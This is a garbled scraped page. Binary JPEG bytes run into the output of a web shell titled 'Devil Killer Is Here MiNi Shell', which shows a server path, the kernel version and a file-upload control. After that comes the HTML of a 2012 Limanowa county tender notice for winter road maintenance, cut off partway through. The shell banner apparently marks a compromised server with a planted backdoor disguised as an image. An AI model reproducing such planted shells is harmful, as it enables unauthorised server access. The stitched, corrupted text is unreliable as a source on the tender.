JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/272422-N-2012.html

<p class="kh_header"><b>Limanowa: Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD oraz wynajem koparko - ładowarki, równiarki i pługa wirnikowego przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013</b><br>
<b>Numer ogłoszenia: 272422 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Józefa Marka 9, 34-600 Limanowa, woj. małopolskie, tel. 0-18 3375-831, faks 0-18 3375-832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.limanowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD oraz wynajem koparko - ładowarki, równiarki i pługa wirnikowego przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD oraz wynajem koparko - ładowarki, równiarki i pługa wirnikowego przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 60.18.10.00-0, 60.18.20.00-7, 63.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 
Dla zadania częściowego nr 1: 1 300.00 PLN (słownie: jeden tysiąc trzysta 00/100 PLN)
Dla zadania częściowego nr 2: 850.00 PLN (słownie: osiemset pięćdziesiąt 00/100 PLN)
Dla zadania częściowego nr 3: 760.00 PLN (słownie: siedemset sześćdziesiąt 00/100 PLN)
Dla zadania częściowego nr 4: 740.00 PLN (słownie: siedemset czterdzieści 00/100 PLN)
Dla zadania częściowego nr 5: 2 500.00 PLN (słownie: dwa tysiące pięćset 00/100 PLN)
Dla zadania częściowego nr 6: 760.00 PLN (słownie: siedemset sześćdziesiąt 00/100 PLN)
Dla zadania częściowego nr 7: 300.00 PLN (słownie: trzysta 00/100 PLN)
Dla zadania częściowego nr 8: 300.00 PLN (słownie: trzysta 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże w przedłożonym do oferty wykazie usług, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że wykazane usługi zostały wykonane należycie) wykonał co najmniej 1 usługę z zakresu zimowego utrzymania dróg. 
Spełnienie warunku Wykonawca wykaże przedkładając Wykaz usług wraz z dokumentami potwierdzającymi, że wykazane usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże w przedłożonym do oferty wykazie narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, dostęp do:
1.	co najmniej 1 pojazdu samochodowego o mocy co najmniej 250 KM oraz napędem na minimum 2 osie na każde zadanie częściowe oddzielnie w przypadku składania oferty na zadanie częściowe nr 1,2,3,4. W przypadku składania oferty na więcej niż jedno zadanie częściowe, Wykonawca winien wykazać dysponowanie dodatkowo 1 pojazdem samochodowym dla każdego następnego zadania częściowego,
2.	co najmniej 2 pojazdami samochodowymi o mocy co najmniej 250 KM oraz napędem na minimum 2 osie w przypadku składania oferty na zadanie częściowe nr 5,
3.	co najmniej 1 koparko - ładowarki o max. wysokość sprzętu 2,6 m w przypadku oferty na zadanie częściowe nr 6,
4.	co najmniej 1 równiarki w przypadku składania oferty na zadanie częściowe nr 7,
5.	co najmniej 1 pługa wirnikowego w przypadku składania oferty na zadanie częściowe nr 8.
Spełnienie warunku wykonawca wykaże przedkładając Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże przy pomocy przedłożonej wraz z ofertą opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną w wysokości nie mniejszej niż:
1.	35 000,00 zł w przypadku składania oferty na zadanie częściowe nr 1
2.	20 000,00 zł w przypadku składania oferty na zadanie częściowe nr 2,3,4 i 6
3.	70 000,00 zł w przypadku składania oferty na zadanie częściowe nr 5
4.	7 000,00 zł w przypadku składania oferty na zadanie częściowe nr 7,8</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, jeżeli wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana istotnych postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ. Zamawiający przewiduje następujące zmiany istotnych postanowień umowy:
1)	Okresy trwania prac przy zimowym utrzymaniu dróg powiatowych mogą być wydłużone lub skrócone ze względu na utrzymujące się bądź nie warunki zimowe. Data początku dyspozycyjności Wykonawcy, oraz początku obowiązywania umowy może ulec przesunięciu w przypadku gdyby z uwagi na przedłużające się postępowanie o udzielenie zamówienia publicznego niemożliwe byłoby zawarcie umowy przed upływem terminu wskazanego w pkt. 5.1 SIWZ.
2)	Dopuszcza się możliwość zwiększenia limitu finansowego przeznaczonego na realizacje przedmiotu zamówienia, jeżeli będzie zachodziła potrzeba dalszej realizacji usługi z uwagi na utrzymujące się warunki zimowe. 
3)	Zmiana w zakresie podwykonawcy i zakresu realizowanych przez niego robót jest możliwa za uprzednią zgodą Zamawiającego zgodnie z art. 6471 KC. Zmiana podmiotów trzecich na etapie realizacji zamówienia na zasobach których wykonawca opierał się wykazując spełniania warunków udziału w postępowaniu jest możliwa jeśli nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca. 
4)	Zmiana sprzętu przy pomocy którego Wykonawca realizuje przedmiot umowy, na inny spełniający wymagania określone w SIWZ.
5)	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze SIWZ,
b)	zmianie uległy przepisy prawne istotne dla realizacji przedmiotu zamówienia,
c)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy,
d)	zmiany dotyczące terminów płatności,
e)	zmiana miejsca świadczenia usługi, 
f)	zmianie uległy stawki podatku VAT (Zamawiający przewiduje możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT),
g)	rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
h)	zmiany zapisów umowy będące będących wynikiem realizacji przez Zamawiającego uprawnień z tytułu rękojmi lub gwarancji na wykonane prace,
i)	zmiany korzystne dla Zamawiającego w następstwie okoliczności których nie można było przewidzieć w chwili zawarcia umowy.
Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienia ani na wynik postępowania. Takimi zmianami są zmiany o charakterze administracyjno - organizacyjnym umowy np. zmiana nr konta bankowego, dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno - prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.
Zmiany do umowy może inicjować zarówno zamawiający jak i wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmian i jej uzasadnieniem, Zamawiający przewiduje katalog zmian na które może wyrazić zgodę, powyższe nie stanowi jednocześnie zobowiązania do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/powiaty/root_limanowski/Wprowadzenie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, pokój nr 233, II piętro, budynek B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 11:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, pokój nr: Kancelaria Ogólna Starostwa Powiatowego w Limanowej, I piętro, budynek B do dnia 2012-08-07 do godz. 11:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD, przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 w grupie dróg X1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nośnikami przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego pod nadzorem własnym Powiatowego Zarządu Dróg w sezonie zimowym 2012/2013.
W gestii Wykonawcy jest zapewnienie sprawnej jednostki transportowej wraz z kierowcą dla potrzeb zimowego utrzymania dróg.
Wykonawca wykonuje usługi sprzętem (piaskarki, pługi, czołownice) powierzonym przez Powiatowy Zarząd Dróg w grupie dróg X1 (odc. dróg. Jodłownik - Tymbark, oraz Dobra - Podłopień).
Świadczenie usług jednostkami transportowymi polega w szczególności na:
1.	przygotowaniu powierzonego sprzętu do pełnej sprawności technicznej,
2.	zwalczaniu gołoledzi (śliskości) materiałami uszorstniającymi i mieszankami chemicznymi i niechemicznymi, przy użyciu materiałów i piaskarki PZD w Limanowej,
3.	odśnieżaniu dróg przy użyciu pługu PZD w Limanowej,
4.	pełnieniu dyżurów sprzętu w wymiarze określonym przez Zamawiającego
5.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych powierzonego sprzętu,
6.	po zakończeniu akcji zimowej, wykonaniu naprawy i konserwacji powierzonego sprzętu, oraz wymianie zużytych części eksploatacyjnych na nowe i zwrocie całego wyposażenia - osprzętu do 15.05.2013r.
7.	wykonaniu koniecznych napraw przy użyciu części dostarczonych przez PZD w przypadku uszkodzenia powierzonego sprzętu nie z winy Wykonawcy.
Zakres zamówienia obejmuje zimowe utrzymanie 15,215 km dróg powiatowych.
Materiały niezbędne do zwalczania śliskości zapewni Zamawiający. 
Mechaniczny załadunek piaskarek materiałami uszorstniającymi i mieszankami chemicznymi zapewni Zamawiający. 
Szczegółowy zakres przedmiotu zamówienia określa Szczegółowa Specyfikacja Techniczna - SST oraz wykaz dróg wraz z kilometrażem będące załącznikami do niniejszej specyfikacji.
Umowny sezon zimowego utrzymania dróg trwa od 01.11.2012 do 31.03.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD, przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 w grupie dróg X2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nośnikami przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego pod nadzorem własnym Powiatowego Zarządu Dróg w sezonie zimowym 2012/2013.
W gestii Wykonawcy jest zapewnienie sprawnej jednostki transportowej wraz z kierowcą dla potrzeb zimowego utrzymania dróg.
Wykonawca wykonuje usługi sprzętem (piaskarki, pługi, czołownice) powierzonym przez Powiatowy Zarząd Dróg w grupie dróg X2 (odc. dróg. Rupniów - Szyk - Mstów, oraz Piekiełko - Tymbark).
Świadczenie usług jednostkami transportowymi polega w szczególności na:
1.	przygotowaniu powierzonego sprzętu do pełnej sprawności technicznej,
2.	zwalczaniu gołoledzi (śliskości) materiałami uszorstniającymi i mieszankami chemicznymi i niechemicznymi, przy użyciu materiałów i piaskarki PZD w Limanowej,
3.	odśnieżaniu dróg przy użyciu pługu PZD w Limanowej,
4.	pełnieniu dyżurów sprzętu w wymiarze określonym przez Zamawiającego
5.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych powierzonego sprzętu,
6.	po zakończeniu akcji zimowej, wykonaniu naprawy i konserwacji powierzonego sprzętu, oraz wymianie zużytych części eksploatacyjnych na nowe i zwrocie całego wyposażenia - osprzętu do 15.05.2013r.
7.	wykonaniu koniecznych napraw przy użyciu części dostarczonych przez PZD w przypadku uszkodzenia powierzonego sprzętu nie z winy Wykonawcy.
Zakres zamówienia obejmuje zimowe utrzymanie 13,559 km dróg powiatowych.
Materiały niezbędne do zwalczania śliskości zapewni Zamawiający. 
Mechaniczny załadunek piaskarek materiałami uszorstniającymi i mieszankami chemicznymi zapewni Zamawiający. 
Szczegółowy zakres przedmiotu zamówienia określa Szczegółowa Specyfikacja Techniczna - SST oraz wykaz dróg wraz z kilometrażem będące załącznikami do niniejszej specyfikacji.
Umowny sezon zimowego utrzymania dróg trwa od 01.11.2012 do 31.03.2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD, przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 w grupie dróg X3.</p>
